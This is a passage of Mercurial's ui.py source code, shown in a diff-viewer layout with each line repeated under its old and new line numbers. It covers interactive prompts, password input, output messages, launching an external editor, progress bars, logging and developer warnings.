1633 # we use rawinput() only if call_readline() will be invoked by
1633 # we use rawinput() only if call_readline() will be invoked by
1634 # PyOS_Readline(), so no I/O will be made at Python layer.
1634 # PyOS_Readline(), so no I/O will be made at Python layer.
1635 usereadline = (
1635 usereadline = (
1636 self._isatty(self._fin)
1636 self._isatty(self._fin)
1637 and self._isatty(self._fout)
1637 and self._isatty(self._fout)
1638 and procutil.isstdin(self._fin)
1638 and procutil.isstdin(self._fin)
1639 and procutil.isstdout(self._fout)
1639 and procutil.isstdout(self._fout)
1640 )
1640 )
1641 if usereadline:
1641 if usereadline:
1642 try:
1642 try:
1643 # magically add command line editing support, where
1643 # magically add command line editing support, where
1644 # available
1644 # available
1645 import readline
1645 import readline
1646
1646
1647 # force demandimport to really load the module
1647 # force demandimport to really load the module
1648 readline.read_history_file
1648 readline.read_history_file
1649 # windows sometimes raises something other than ImportError
1649 # windows sometimes raises something other than ImportError
1650 except Exception:
1650 except Exception:
1651 usereadline = False
1651 usereadline = False
1652
1652
1653 if self._colormode == b'win32' or not usereadline:
1653 if self._colormode == b'win32' or not usereadline:
1654 if not promptopts:
1654 if not promptopts:
1655 promptopts = {}
1655 promptopts = {}
1656 self._writemsgnobuf(
1656 self._writemsgnobuf(
1657 self._fmsgout, prompt, type=b'prompt', **promptopts
1657 self._fmsgout, prompt, type=b'prompt', **promptopts
1658 )
1658 )
1659 self.flush()
1659 self.flush()
1660 prompt = b' '
1660 prompt = b' '
1661 else:
1661 else:
1662 prompt = self.label(prompt, b'ui.prompt') + b' '
1662 prompt = self.label(prompt, b'ui.prompt') + b' '
1663
1663
1664 # prompt ' ' must exist; otherwise readline may delete entire line
1664 # prompt ' ' must exist; otherwise readline may delete entire line
1665 # - http://bugs.python.org/issue12833
1665 # - http://bugs.python.org/issue12833
1666 with self.timeblockedsection(b'stdio'):
1666 with self.timeblockedsection(b'stdio'):
1667 if usereadline:
1667 if usereadline:
1668 self.flush()
1668 self.flush()
1669 prompt = encoding.strfromlocal(prompt)
1669 prompt = encoding.strfromlocal(prompt)
1670 line = encoding.strtolocal(pycompat.rawinput(prompt))
1670 line = encoding.strtolocal(pycompat.rawinput(prompt))
1671 # When stdin is in binary mode on Windows, it can cause
1671 # When stdin is in binary mode on Windows, it can cause
1672 # raw_input() to emit an extra trailing carriage return
1672 # raw_input() to emit an extra trailing carriage return
1673 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1673 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1674 line = line[:-1]
1674 line = line[:-1]
1675 else:
1675 else:
1676 self._fout.write(pycompat.bytestr(prompt))
1676 self._fout.write(pycompat.bytestr(prompt))
1677 self._fout.flush()
1677 self._fout.flush()
1678 line = self._fin.readline()
1678 line = self._fin.readline()
1679 if not line:
1679 if not line:
1680 raise EOFError
1680 raise EOFError
1681 line = line.rstrip(pycompat.oslinesep)
1681 line = line.rstrip(pycompat.oslinesep)
1682
1682
1683 return line
1683 return line
1684
1684
1685 def prompt(self, msg, default=b"y"):
1685 def prompt(self, msg, default=b"y"):
1686 """Prompt user with msg, read response.
1686 """Prompt user with msg, read response.
1687 If ui is not interactive, the default is returned.
1687 If ui is not interactive, the default is returned.
1688 """
1688 """
1689 return self._prompt(msg, default=default)
1689 return self._prompt(msg, default=default)
1690
1690
1691 def _prompt(self, msg, **opts):
1691 def _prompt(self, msg, **opts):
1692 default = opts['default']
1692 default = opts['default']
1693 if not self.interactive():
1693 if not self.interactive():
1694 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1694 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1695 self._writemsg(
1695 self._writemsg(
1696 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1696 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1697 )
1697 )
1698 return default
1698 return default
1699 try:
1699 try:
1700 r = self._readline(prompt=msg, promptopts=opts)
1700 r = self._readline(prompt=msg, promptopts=opts)
1701 if not r:
1701 if not r:
1702 r = default
1702 r = default
1703 if self.configbool(b'ui', b'promptecho'):
1703 if self.configbool(b'ui', b'promptecho'):
1704 self._writemsg(
1704 self._writemsg(
1705 self._fmsgout, r or b'', b"\n", type=b'promptecho'
1705 self._fmsgout, r or b'', b"\n", type=b'promptecho'
1706 )
1706 )
1707 return r
1707 return r
1708 except EOFError:
1708 except EOFError:
1709 raise error.ResponseExpected()
1709 raise error.ResponseExpected()
1710
1710
1711 @staticmethod
1711 @staticmethod
1712 def extractchoices(prompt):
1712 def extractchoices(prompt):
1713 """Extract prompt message and list of choices from specified prompt.
1713 """Extract prompt message and list of choices from specified prompt.
1714
1714
1715 This returns tuple "(message, choices)", and "choices" is the
1715 This returns tuple "(message, choices)", and "choices" is the
1716 list of tuple "(response character, text without &)".
1716 list of tuple "(response character, text without &)".
1717
1717
1718 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1718 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1719 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1719 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1720 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1720 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1721 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1721 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1722 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1722 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1723 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1723 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1724 """
1724 """
1725
1725
1726 # Sadly, the prompt string may have been built with a filename
1726 # Sadly, the prompt string may have been built with a filename
1727 # containing "$$" so let's try to find the first valid-looking
1727 # containing "$$" so let's try to find the first valid-looking
1728 # prompt to start parsing. Sadly, we also can't rely on
1728 # prompt to start parsing. Sadly, we also can't rely on
1729 # choices containing spaces, ASCII, or basically anything
1729 # choices containing spaces, ASCII, or basically anything
1730 # except an ampersand followed by a character.
1730 # except an ampersand followed by a character.
1731 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1731 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1732 msg = m.group(1)
1732 msg = m.group(1)
1733 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1733 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1734
1734
1735 def choicetuple(s):
1735 def choicetuple(s):
1736 ampidx = s.index(b'&')
1736 ampidx = s.index(b'&')
1737 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1737 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1738
1738
1739 return (msg, [choicetuple(s) for s in choices])
1739 return (msg, [choicetuple(s) for s in choices])
1740
1740
1741 def promptchoice(self, prompt, default=0):
1741 def promptchoice(self, prompt, default=0):
1742 """Prompt user with a message, read response, and ensure it matches
1742 """Prompt user with a message, read response, and ensure it matches
1743 one of the provided choices. The prompt is formatted as follows:
1743 one of the provided choices. The prompt is formatted as follows:
1744
1744
1745 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1745 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1746
1746
1747 The index of the choice is returned. Responses are case
1747 The index of the choice is returned. Responses are case
1748 insensitive. If ui is not interactive, the default is
1748 insensitive. If ui is not interactive, the default is
1749 returned.
1749 returned.
1750 """
1750 """
1751
1751
1752 msg, choices = self.extractchoices(prompt)
1752 msg, choices = self.extractchoices(prompt)
1753 resps = [r for r, t in choices]
1753 resps = [r for r, t in choices]
1754 while True:
1754 while True:
1755 r = self._prompt(msg, default=resps[default], choices=choices)
1755 r = self._prompt(msg, default=resps[default], choices=choices)
1756 if r.lower() in resps:
1756 if r.lower() in resps:
1757 return resps.index(r.lower())
1757 return resps.index(r.lower())
1758 # TODO: shouldn't it be a warning?
1758 # TODO: shouldn't it be a warning?
1759 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1759 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1760
1760
1761 def getpass(self, prompt=None, default=None):
1761 def getpass(self, prompt=None, default=None):
1762 if not self.interactive():
1762 if not self.interactive():
1763 return default
1763 return default
1764 try:
1764 try:
1765 self._writemsg(
1765 self._writemsg(
1766 self._fmsgerr,
1766 self._fmsgerr,
1767 prompt or _(b'password: '),
1767 prompt or _(b'password: '),
1768 type=b'prompt',
1768 type=b'prompt',
1769 password=True,
1769 password=True,
1770 )
1770 )
1771 # disable getpass() only if explicitly specified. it's still valid
1771 # disable getpass() only if explicitly specified. it's still valid
1772 # to interact with tty even if fin is not a tty.
1772 # to interact with tty even if fin is not a tty.
1773 with self.timeblockedsection(b'stdio'):
1773 with self.timeblockedsection(b'stdio'):
1774 if self.configbool(b'ui', b'nontty'):
1774 if self.configbool(b'ui', b'nontty'):
1775 l = self._fin.readline()
1775 l = self._fin.readline()
1776 if not l:
1776 if not l:
1777 raise EOFError
1777 raise EOFError
1778 return l.rstrip(b'\n')
1778 return l.rstrip(b'\n')
1779 else:
1779 else:
1780 return encoding.strtolocal(getpass.getpass(''))
1780 return encoding.strtolocal(getpass.getpass(''))
1781 except EOFError:
1781 except EOFError:
1782 raise error.ResponseExpected()
1782 raise error.ResponseExpected()
1783
1783
1784 def status(self, *msg, **opts):
1784 def status(self, *msg, **opts):
1785 """write status message to output (if ui.quiet is False)
1785 """write status message to output (if ui.quiet is False)
1786
1786
1787 This adds an output label of "ui.status".
1787 This adds an output label of "ui.status".
1788 """
1788 """
1789 if not self.quiet:
1789 if not self.quiet:
1790 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1790 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1791
1791
1792 def warn(self, *msg, **opts):
1792 def warn(self, *msg, **opts):
1793 """write warning message to output (stderr)
1793 """write warning message to output (stderr)
1794
1794
1795 This adds an output label of "ui.warning".
1795 This adds an output label of "ui.warning".
1796 """
1796 """
1797 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1797 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1798
1798
1799 def error(self, *msg, **opts):
1799 def error(self, *msg, **opts):
1800 """write error message to output (stderr)
1800 """write error message to output (stderr)
1801
1801
1802 This adds an output label of "ui.error".
1802 This adds an output label of "ui.error".
1803 """
1803 """
1804 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1804 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1805
1805
1806 def note(self, *msg, **opts):
1806 def note(self, *msg, **opts):
1807 """write note to output (if ui.verbose is True)
1807 """write note to output (if ui.verbose is True)
1808
1808
1809 This adds an output label of "ui.note".
1809 This adds an output label of "ui.note".
1810 """
1810 """
1811 if self.verbose:
1811 if self.verbose:
1812 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1812 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1813
1813
1814 def debug(self, *msg, **opts):
1814 def debug(self, *msg, **opts):
1815 """write debug message to output (if ui.debugflag is True)
1815 """write debug message to output (if ui.debugflag is True)
1816
1816
1817 This adds an output label of "ui.debug".
1817 This adds an output label of "ui.debug".
1818 """
1818 """
1819 if self.debugflag:
1819 if self.debugflag:
1820 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1820 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1821 self.log(b'debug', b'%s', b''.join(msg))
1821 self.log(b'debug', b'%s', b''.join(msg))
1822
1822
1823 # Aliases to defeat check-code.
1823 # Aliases to defeat check-code.
1824 statusnoi18n = status
1824 statusnoi18n = status
1825 notenoi18n = note
1825 notenoi18n = note
1826 warnnoi18n = warn
1826 warnnoi18n = warn
1827 writenoi18n = write
1827 writenoi18n = write
1828
1828
1829 def edit(
1829 def edit(
1830 self,
1830 self,
1831 text,
1831 text,
1832 user,
1832 user,
1833 extra=None,
1833 extra=None,
1834 editform=None,
1834 editform=None,
1835 pending=None,
1835 pending=None,
1836 repopath=None,
1836 repopath=None,
1837 action=None,
1837 action=None,
1838 ):
1838 ):
1839 if action is None:
1839 if action is None:
1840 self.develwarn(
1840 self.develwarn(
1841 b'action is None but will soon be a required '
1841 b'action is None but will soon be a required '
1842 b'parameter to ui.edit()'
1842 b'parameter to ui.edit()'
1843 )
1843 )
1844 extra_defaults = {
1844 extra_defaults = {
1845 b'prefix': b'editor',
1845 b'prefix': b'editor',
1846 b'suffix': b'.txt',
1846 b'suffix': b'.txt',
1847 }
1847 }
1848 if extra is not None:
1848 if extra is not None:
1849 if extra.get(b'suffix') is not None:
1849 if extra.get(b'suffix') is not None:
1850 self.develwarn(
1850 self.develwarn(
1851 b'extra.suffix is not None but will soon be '
1851 b'extra.suffix is not None but will soon be '
1852 b'ignored by ui.edit()'
1852 b'ignored by ui.edit()'
1853 )
1853 )
1854 extra_defaults.update(extra)
1854 extra_defaults.update(extra)
1855 extra = extra_defaults
1855 extra = extra_defaults
1856
1856
1857 if action == b'diff':
1857 if action == b'diff':
1858 suffix = b'.diff'
1858 suffix = b'.diff'
1859 elif action:
1859 elif action:
1860 suffix = b'.%s.hg.txt' % action
1860 suffix = b'.%s.hg.txt' % action
1861 else:
1861 else:
1862 suffix = extra[b'suffix']
1862 suffix = extra[b'suffix']
1863
1863
1864 rdir = None
1864 rdir = None
1865 if self.configbool(b'experimental', b'editortmpinhg'):
1865 if self.configbool(b'experimental', b'editortmpinhg'):
1866 rdir = repopath
1866 rdir = repopath
1867 (fd, name) = pycompat.mkstemp(
1867 (fd, name) = pycompat.mkstemp(
1868 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1868 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1869 )
1869 )
1870 try:
1870 try:
1871 with os.fdopen(fd, 'wb') as f:
1871 with os.fdopen(fd, 'wb') as f:
1872 f.write(util.tonativeeol(text))
1872 f.write(util.tonativeeol(text))
1873
1873
1874 environ = {b'HGUSER': user}
1874 environ = {b'HGUSER': user}
1875 if b'transplant_source' in extra:
1875 if b'transplant_source' in extra:
1876 environ.update(
1876 environ.update(
1877 {b'HGREVISION': hex(extra[b'transplant_source'])}
1877 {b'HGREVISION': hex(extra[b'transplant_source'])}
1878 )
1878 )
1879 for label in (b'intermediate-source', b'source', b'rebase_source'):
1879 for label in (b'intermediate-source', b'source', b'rebase_source'):
1880 if label in extra:
1880 if label in extra:
1881 environ.update({b'HGREVISION': extra[label]})
1881 environ.update({b'HGREVISION': extra[label]})
1882 break
1882 break
1883 if editform:
1883 if editform:
1884 environ.update({b'HGEDITFORM': editform})
1884 environ.update({b'HGEDITFORM': editform})
1885 if pending:
1885 if pending:
1886 environ.update({b'HG_PENDING': pending})
1886 environ.update({b'HG_PENDING': pending})
1887
1887
1888 editor = self.geteditor()
1888 editor = self.geteditor()
1889
1889
1890 self.system(
1890 self.system(
1891 b"%s \"%s\"" % (editor, name),
1891 b"%s \"%s\"" % (editor, name),
1892 environ=environ,
1892 environ=environ,
1893 onerr=error.CanceledError,
1893 onerr=error.CanceledError,
1894 errprefix=_(b"edit failed"),
1894 errprefix=_(b"edit failed"),
1895 blockedtag=b'editor',
1895 blockedtag=b'editor',
1896 )
1896 )
1897
1897
1898 with open(name, 'rb') as f:
1898 with open(name, 'rb') as f:
1899 t = util.fromnativeeol(f.read())
1899 t = util.fromnativeeol(f.read())
1900 finally:
1900 finally:
1901 os.unlink(name)
1901 os.unlink(name)
1902
1902
1903 return t
1903 return t
1904
1904
1905 def system(
1905 def system(
1906 self,
1906 self,
1907 cmd,
1907 cmd,
1908 environ=None,
1908 environ=None,
1909 cwd=None,
1909 cwd=None,
1910 onerr=None,
1910 onerr=None,
1911 errprefix=None,
1911 errprefix=None,
1912 blockedtag=None,
1912 blockedtag=None,
1913 ):
1913 ):
1914 """execute shell command with appropriate output stream. command
1914 """execute shell command with appropriate output stream. command
1915 output will be redirected if fout is not stdout.
1915 output will be redirected if fout is not stdout.
1916
1916
1917 if command fails and onerr is None, return status, else raise onerr
1917 if command fails and onerr is None, return status, else raise onerr
1918 object as exception.
1918 object as exception.
1919 """
1919 """
1920 if blockedtag is None:
1920 if blockedtag is None:
1921 # Long cmds tend to be because of an absolute path on cmd. Keep
1921 # Long cmds tend to be because of an absolute path on cmd. Keep
1922 # the tail end instead
1922 # the tail end instead
1923 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1923 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1924 blockedtag = b'unknown_system_' + cmdsuffix
1924 blockedtag = b'unknown_system_' + cmdsuffix
1925 out = self._fout
1925 out = self._fout
1926 if any(s[1] for s in self._bufferstates):
1926 if any(s[1] for s in self._bufferstates):
1927 out = self
1927 out = self
1928 with self.timeblockedsection(blockedtag):
1928 with self.timeblockedsection(blockedtag):
1929 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1929 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1930 if rc and onerr:
1930 if rc and onerr:
1931 errmsg = b'%s %s' % (
1931 errmsg = b'%s %s' % (
1932 procutil.shellsplit(cmd)[0],
1932 procutil.shellsplit(cmd)[0],
1933 procutil.explainexit(rc),
1933 procutil.explainexit(rc),
1934 )
1934 )
1935 if errprefix:
1935 if errprefix:
1936 errmsg = b'%s: %s' % (errprefix, errmsg)
1936 errmsg = b'%s: %s' % (errprefix, errmsg)
1937 raise onerr(errmsg)
1937 raise onerr(errmsg)
1938 return rc
1938 return rc
1939
1939
1940 def _runsystem(self, cmd, environ, cwd, out):
1940 def _runsystem(self, cmd, environ, cwd, out):
1941 """actually execute the given shell command (can be overridden by
1941 """actually execute the given shell command (can be overridden by
1942 extensions like chg)"""
1942 extensions like chg)"""
1943 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1943 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1944
1944
1945 def traceback(self, exc=None, force=False):
1945 def traceback(self, exc=None, force=False):
1946 """print exception traceback if traceback printing enabled or forced.
1946 """print exception traceback if traceback printing enabled or forced.
1947 only to call in exception handler. returns true if traceback
1947 only to call in exception handler. returns true if traceback
1948 printed."""
1948 printed."""
1949 if self.tracebackflag or force:
1949 if self.tracebackflag or force:
1950 if exc is None:
1950 if exc is None:
1951 exc = sys.exc_info()
1951 exc = sys.exc_info()
1952 cause = getattr(exc[1], 'cause', None)
1952 cause = getattr(exc[1], 'cause', None)
1953
1953
1954 if cause is not None:
1954 if cause is not None:
1955 causetb = traceback.format_tb(cause[2])
1955 causetb = traceback.format_tb(cause[2])
1956 exctb = traceback.format_tb(exc[2])
1956 exctb = traceback.format_tb(exc[2])
1957 exconly = traceback.format_exception_only(cause[0], cause[1])
1957 exconly = traceback.format_exception_only(cause[0], cause[1])
1958
1958
1959 # exclude frame where 'exc' was chained and rethrown from exctb
1959 # exclude frame where 'exc' was chained and rethrown from exctb
1960 self.write_err(
1960 self.write_err(
1961 b'Traceback (most recent call last):\n',
1961 b'Traceback (most recent call last):\n',
1962 encoding.strtolocal(''.join(exctb[:-1])),
1962 encoding.strtolocal(''.join(exctb[:-1])),
1963 encoding.strtolocal(''.join(causetb)),
1963 encoding.strtolocal(''.join(causetb)),
1964 encoding.strtolocal(''.join(exconly)),
1964 encoding.strtolocal(''.join(exconly)),
1965 )
1965 )
1966 else:
1966 else:
1967 output = traceback.format_exception(exc[0], exc[1], exc[2])
1967 output = traceback.format_exception(exc[0], exc[1], exc[2])
1968 self.write_err(encoding.strtolocal(''.join(output)))
1968 self.write_err(encoding.strtolocal(''.join(output)))
1969 return self.tracebackflag or force
1969 return self.tracebackflag or force
1970
1970
1971 def geteditor(self):
1971 def geteditor(self):
1972 '''return editor to use'''
1972 '''return editor to use'''
1973 if pycompat.sysplatform == b'plan9':
1973 if pycompat.sysplatform == b'plan9':
1974 # vi is the MIPS instruction simulator on Plan 9. We
1974 # vi is the MIPS instruction simulator on Plan 9. We
1975 # instead default to E to plumb commit messages to
1975 # instead default to E to plumb commit messages to
1976 # avoid confusion.
1976 # avoid confusion.
1977 editor = b'E'
1977 editor = b'E'
1978 elif pycompat.isdarwin:
1978 elif pycompat.isdarwin:
1979 # vi on darwin is POSIX compatible to a fault, and that includes
1979 # vi on darwin is POSIX compatible to a fault, and that includes
1980 # exiting non-zero if you make any mistake when running an ex
1980 # exiting non-zero if you make any mistake when running an ex
1981 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1981 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1982 # while s/vi/vim/ doesn't.
1982 # while s/vi/vim/ doesn't.
1983 editor = b'vim'
1983 editor = b'vim'
1984 else:
1984 else:
1985 editor = b'vi'
1985 editor = b'vi'
1986 return encoding.environ.get(b"HGEDITOR") or self.config(
1986 return encoding.environ.get(b"HGEDITOR") or self.config(
1987 b"ui", b"editor", editor
1987 b"ui", b"editor", editor
1988 )
1988 )
1989
1989
1990 @util.propertycache
1990 @util.propertycache
1991 def _progbar(self):
1991 def _progbar(self):
1992 """setup the progbar singleton to the ui object"""
1992 """setup the progbar singleton to the ui object"""
1993 if (
1993 if (
1994 self.quiet
1994 self.quiet
1995 or self.debugflag
1995 or self.debugflag
1996 or self.configbool(b'progress', b'disable')
1996 or self.configbool(b'progress', b'disable')
1997 or not progress.shouldprint(self)
1997 or not progress.shouldprint(self)
1998 ):
1998 ):
1999 return None
1999 return None
2000 return getprogbar(self)
2000 return getprogbar(self)
2001
2001
2002 def _progclear(self):
2002 def _progclear(self):
2003 """clear progress bar output if any. use it before any output"""
2003 """clear progress bar output if any. use it before any output"""
2004 if not haveprogbar(): # nothing loaded yet
2004 if not haveprogbar(): # nothing loaded yet
2005 return
2005 return
2006 if self._progbar is not None and self._progbar.printed:
2006 if self._progbar is not None and self._progbar.printed:
2007 self._progbar.clear()
2007 self._progbar.clear()
2008
2008
2009 def makeprogress(self, topic, unit=b"", total=None):
2009 def makeprogress(self, topic, unit=b"", total=None):
2010 """Create a progress helper for the specified topic"""
2010 """Create a progress helper for the specified topic"""
2011 if getattr(self._fmsgerr, 'structured', False):
2011 if getattr(self._fmsgerr, 'structured', False):
2012 # channel for machine-readable output with metadata, just send
2012 # channel for machine-readable output with metadata, just send
2013 # raw information
2013 # raw information
2014 # TODO: consider porting some useful information (e.g. estimated
2014 # TODO: consider porting some useful information (e.g. estimated
2015 # time) from progbar. we might want to support update delay to
2015 # time) from progbar. we might want to support update delay to
2016 # reduce the cost of transferring progress messages.
2016 # reduce the cost of transferring progress messages.
2017 def updatebar(topic, pos, item, unit, total):
2017 def updatebar(topic, pos, item, unit, total):
2018 self._fmsgerr.write(
2018 self._fmsgerr.write(
2019 None,
2019 None,
2020 type=b'progress',
2020 type=b'progress',
2021 topic=topic,
2021 topic=topic,
2022 pos=pos,
2022 pos=pos,
2023 item=item,
2023 item=item,
2024 unit=unit,
2024 unit=unit,
2025 total=total,
2025 total=total,
2026 )
2026 )
2027
2027
2028 elif self._progbar is not None:
2028 elif self._progbar is not None:
2029 updatebar = self._progbar.progress
2029 updatebar = self._progbar.progress
2030 else:
2030 else:
2031
2031
2032 def updatebar(topic, pos, item, unit, total):
2032 def updatebar(topic, pos, item, unit, total):
2033 pass
2033 pass
2034
2034
2035 return scmutil.progress(self, updatebar, topic, unit, total)
2035 return scmutil.progress(self, updatebar, topic, unit, total)
2036
2036
2037 def getlogger(self, name):
2037 def getlogger(self, name):
2038 """Returns a logger of the given name; or None if not registered"""
2038 """Returns a logger of the given name; or None if not registered"""
2039 return self._loggers.get(name)
2039 return self._loggers.get(name)
2040
2040
2041 def setlogger(self, name, logger):
2041 def setlogger(self, name, logger):
2042 """Install logger which can be identified later by the given name
2042 """Install logger which can be identified later by the given name
2043
2043
2044 More than one loggers can be registered. Use extension or module
2044 More than one loggers can be registered. Use extension or module
2045 name to uniquely identify the logger instance.
2045 name to uniquely identify the logger instance.
2046 """
2046 """
2047 self._loggers[name] = logger
2047 self._loggers[name] = logger
2048
2048
2049 def log(self, event, msgfmt, *msgargs, **opts):
2049 def log(self, event, msgfmt, *msgargs, **opts):
2050 """hook for logging facility extensions
2050 """hook for logging facility extensions
2051
2051
2052 event should be a readily-identifiable subsystem, which will
2052 event should be a readily-identifiable subsystem, which will
2053 allow filtering.
2053 allow filtering.
2054
2054
2055 msgfmt should be a newline-terminated format string to log, and
2055 msgfmt should be a newline-terminated format string to log, and
2056 *msgargs are %-formatted into it.
2056 *msgargs are %-formatted into it.
2057
2057
2058 **opts currently has no defined meanings.
2058 **opts currently has no defined meanings.
2059 """
2059 """
2060 if not self._loggers:
2060 if not self._loggers:
2061 return
2061 return
2062 activeloggers = [
2062 activeloggers = [
2063 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
2063 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
2064 ]
2064 ]
2065 if not activeloggers:
2065 if not activeloggers:
2066 return
2066 return
2067 msg = msgfmt % msgargs
2067 msg = msgfmt % msgargs
2068 opts = pycompat.byteskwargs(opts)
2068 opts = pycompat.byteskwargs(opts)
2069 # guard against recursion from e.g. ui.debug()
2069 # guard against recursion from e.g. ui.debug()
2070 registeredloggers = self._loggers
2070 registeredloggers = self._loggers
2071 self._loggers = {}
2071 self._loggers = {}
2072 try:
2072 try:
2073 for logger in activeloggers:
2073 for logger in activeloggers:
2074 logger.log(self, event, msg, opts)
2074 logger.log(self, event, msg, opts)
2075 finally:
2075 finally:
2076 self._loggers = registeredloggers
2076 self._loggers = registeredloggers
2077
2077
2078 def label(self, msg, label):
2078 def label(self, msg, label):
2079 """style msg based on supplied label
2079 """style msg based on supplied label
2080
2080
2081 If some color mode is enabled, this will add the necessary control
2081 If some color mode is enabled, this will add the necessary control
2082 characters to apply such color. In addition, 'debug' color mode adds
2082 characters to apply such color. In addition, 'debug' color mode adds
2083 markup showing which label affects a piece of text.
2083 markup showing which label affects a piece of text.
2084
2084
2085 ui.write(s, 'label') is equivalent to
2085 ui.write(s, 'label') is equivalent to
2086 ui.write(ui.label(s, 'label')).
2086 ui.write(ui.label(s, 'label')).
2087 """
2087 """
2088 if self._colormode is not None:
2088 if self._colormode is not None:
2089 return color.colorlabel(self, msg, label)
2089 return color.colorlabel(self, msg, label)
2090 return msg
2090 return msg
2091
2091
2092 def develwarn(self, msg, stacklevel=1, config=None):
2092 def develwarn(self, msg, stacklevel=1, config=None):
2093 """issue a developer warning message
2093 """issue a developer warning message
2094
2094
2095 Use 'stacklevel' to report the offender some layers further up in the
2095 Use 'stacklevel' to report the offender some layers further up in the
2096 stack.
2096 stack.
2097 """
2097 """
2098 if not self.configbool(b'devel', b'all-warnings'):
2098 if not self.configbool(b'devel', b'all-warnings'):
2099 if config is None or not self.configbool(b'devel', config):
2099 if config is None or not self.configbool(b'devel', config):
2100 return
2100 return
2101 msg = b'devel-warn: ' + msg
2101 msg = b'devel-warn: ' + msg
2102 stacklevel += 1 # get in develwarn
2102 stacklevel += 1 # get in develwarn
2103 if self.tracebackflag:
2103 if self.tracebackflag:
2104 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2104 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2105 self.log(
2105 self.log(
2106 b'develwarn',
2106 b'develwarn',
2107 b'%s at:\n%s'
2107 b'%s at:\n%s'
2108 % (msg, b''.join(util.getstackframes(stacklevel))),
2108 % (msg, b''.join(util.getstackframes(stacklevel))),
2109 )
2109 )
2110 else:
2110 else:
2111 curframe = inspect.currentframe()
2111 curframe = inspect.currentframe()
2112 calframe = inspect.getouterframes(curframe, 2)
2112 calframe = inspect.getouterframes(curframe, 2)
2113 fname, lineno, fmsg = calframe[stacklevel][1:4]
2113 fname, lineno, fmsg = calframe[stacklevel][1:4]
2114 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2114 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2115 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2115 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2116 self.log(
2116 self.log(
2117 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2117 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2118 )
2118 )
2119
2119
2120 # avoid cycles
2120 # avoid cycles
2121 del curframe
2121 del curframe
2122 del calframe
2122 del calframe
2123
2123
2124 def deprecwarn(self, msg, version, stacklevel=2):
2124 def deprecwarn(self, msg, version, stacklevel=2):
2125 """issue a deprecation warning
2125 """issue a deprecation warning
2126
2126
2127 - msg: message explaining what is deprecated and how to upgrade,
2127 - msg: message explaining what is deprecated and how to upgrade,
2128 - version: last version where the API will be supported,
2128 - version: last version where the API will be supported,
2129 """
2129 """
2130 if not (
2130 if not (
2131 self.configbool(b'devel', b'all-warnings')
2131 self.configbool(b'devel', b'all-warnings')
2132 or self.configbool(b'devel', b'deprec-warn')
2132 or self.configbool(b'devel', b'deprec-warn')
2133 ):
2133 ):
2134 return
2134 return
2135 msg += (
2135 msg += (
2136 b"\n(compatibility will be dropped after Mercurial-%s,"
2136 b"\n(compatibility will be dropped after Mercurial-%s,"
2137 b" update your code.)"
2137 b" update your code.)"
2138 ) % version
2138 ) % version
2139 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2139 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2140
2140
2141 def exportableenviron(self):
2141 def exportableenviron(self):
